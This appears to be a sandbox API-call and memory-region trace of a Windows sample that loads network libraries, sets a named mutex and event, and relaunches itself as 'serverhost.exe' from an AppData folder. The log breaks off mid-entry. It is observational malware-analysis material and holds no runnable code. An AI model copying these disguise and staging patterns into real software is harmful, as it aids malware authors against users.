0x0 [0054.933] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.933] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.933] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.933] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.933] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.933] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.933] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.933] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.934] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.934] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.934] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.934] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.934] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.934] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.934] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.934] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.934] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.934] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.934] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.934] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.934] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.934] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.934] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.934] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.934] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.934] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.934] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.934] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.934] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.934] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.935] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.935] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.935] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.935] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.935] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.935] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.935] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.935] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.935] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.935] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.935] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.935] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.935] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.935] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.935] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.935] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.935] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.935] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.935] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.935] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.936] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.936] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.936] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.936] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.936] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.936] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.936] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.936] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.936] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.936] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.936] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.936] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.936] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.936] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.936] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.936] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.936] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.936] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.936] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.936] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.936] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.936] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.937] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.937] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.937] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.937] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.937] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.937] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.937] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.937] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.937] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.937] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.937] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.937] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.937] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.937] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.937] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.937] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.937] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.937] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.937] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.937] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.938] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.938] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.938] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.938] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.938] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.938] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.938] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.938] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.938] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.938] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.938] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.938] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.938] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.938] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.938] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.938] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.938] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.938] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.938] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.938] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.938] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.939] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.939] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.939] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.939] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.939] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.939] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.939] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.939] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.939] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.939] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.939] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.939] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.939] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.939] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.939] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.939] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.939] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.939] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.939] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.939] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.987] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0054.987] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0054.987] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0054.987] VirtualAlloc (lpAddress=0x0, dwSize=0xd000, flAllocationType=0x1000, flProtect=0x4) returned 0x3b0000 [0054.989] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76590000 [0054.989] GetProcAddress (hModule=0x76590000, lpProcName="WTSGetActiveConsoleSessionId") returned 0x765c480b [0054.989] FreeConsole () returned 0 [0054.989] VirtualProtect (in: lpAddress=0x3b1000, dwSize=0x885f, flNewProtect=0x20, lpflOldProtect=0x12fc50 | out: lpflOldProtect=0x12fc50*=0x4) returned 1 [0054.989] VirtualProtect (in: lpAddress=0x3ba000, dwSize=0xb12, flNewProtect=0x2, lpflOldProtect=0x12fc50 | out: lpflOldProtect=0x12fc50*=0x4) returned 1 [0054.989] VirtualProtect (in: lpAddress=0x3bb000, dwSize=0xbd8, flNewProtect=0x4, lpflOldProtect=0x12fc50 | out: lpflOldProtect=0x12fc50*=0x4) returned 1 [0054.989] VirtualProtect (in: lpAddress=0x3bc000, dwSize=0x4d8, flNewProtect=0x2, lpflOldProtect=0x12fc50 | out: lpflOldProtect=0x12fc50*=0x4) returned 1 [0054.989] VirtualProtect (in: lpAddress=0x3b0000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x12fc50 | out: lpflOldProtect=0x12fc50*=0x4) returned 1 [0056.780] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fc18, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0056.780] _snwprintf (in: _Dest=0x12fe20, _Count=0x40, _Format="E%X" | out: _Dest="EA991ED3B") returned 9 [0056.780] _snwprintf (in: _Dest=0x12fea0, _Count=0x40, _Format="M%X" | out: _Dest="MA991ED3B") returned 9 [0056.780] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="EA991ED3B") returned 0xc0 [0056.780] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="MA991ED3B") returned 0xc4 [0056.780] GetLastError () returned 0x0 [0056.780] CreateProcessW (in: lpApplicationName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ff20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ff64 | out: lpCommandLine=0x0, lpProcessInformation=0x12ff64*(hProcess=0xcc, hThread=0xc8, dwProcessId=0xb04, dwThreadId=0xb08)) returned 1 [0056.783] WaitForSingleObject (hHandle=0xc0, dwMilliseconds=0xffffffff) returned 0x0 [0058.967] CloseHandle (hObject=0xcc) returned 1 [0058.967] CloseHandle (hObject=0xc8) returned 1 [0058.967] CloseHandle (hObject=0xc0) returned 1 [0058.967] CloseHandle (hObject=0xc4) returned 1 [0058.967] ExitProcess (uExitCode=0x0) Process: id = "6" image_name = "serverhost.exe" filename = "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe" page_root = "0x7eef72e0" os_pid = "0xb04" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xaf8" cmd_line = "\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\"" cur_dir = "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 937 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 938 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 939 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 940 start_va = 0x400000 end_va = 0x419fff entry_point = 0x401640 region_type = mapped_file name = "42753.exe" filename = "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\42753.exe") Region: id = 941 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 942 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 943 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 944 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 945 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 946 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 947 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 948 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 949 start_va = 0x5f0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 950 start_va = 0x5f9f0000 end_va = 0x5fb92fff entry_point = 0x5fa0e815 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 951 start_va = 0x6eb50000 end_va = 0x6ebd3fff entry_point = 0x6eb519a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 952 start_va = 0x70fc0000 end_va = 0x711fffff entry_point = 0x70fc66bd region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 953 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 954 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 955 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 956 start_va = 0x758a0000 end_va = 0x764e9fff entry_point = 0x75921601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 957 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 958 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 959 start_va = 0x76670000 end_va = 0x766eafff entry_point = 0x76671aee region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 960 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 961 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 962 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 963 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 964 start_va = 0x76b40000 end_va = 0x76b96fff entry_point = 0x76b59ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 965 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 966 start_va = 0x77140000 end_va = 0x7729bfff entry_point = 0x7718ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 967 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 968 start_va = 0x1b0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 969 start_va = 0x773f0000 end_va = 0x773f4fff entry_point = 0x773f1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 970 start_va = 0x2e0000 end_va = 0x3a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 971 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 972 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 973 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 974 start_va = 0x270000 end_va = 0x270fff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 975 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 976 start_va = 0x5b0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 977 start_va = 0x6f0000 end_va = 0x12effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 978 start_va = 0x280000 end_va = 0x291fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 979 start_va = 0x2a0000 end_va = 0x2acfff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 980 start_va = 0x71a10000 end_va = 0x71a67fff entry_point = 0x71a113b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 981 start_va = 0x719c0000 end_va = 0x71a0efff entry_point = 0x719c1452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 982 start_va = 0x76f00000 end_va = 0x77035fff entry_point = 0x76f01b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 983 start_va = 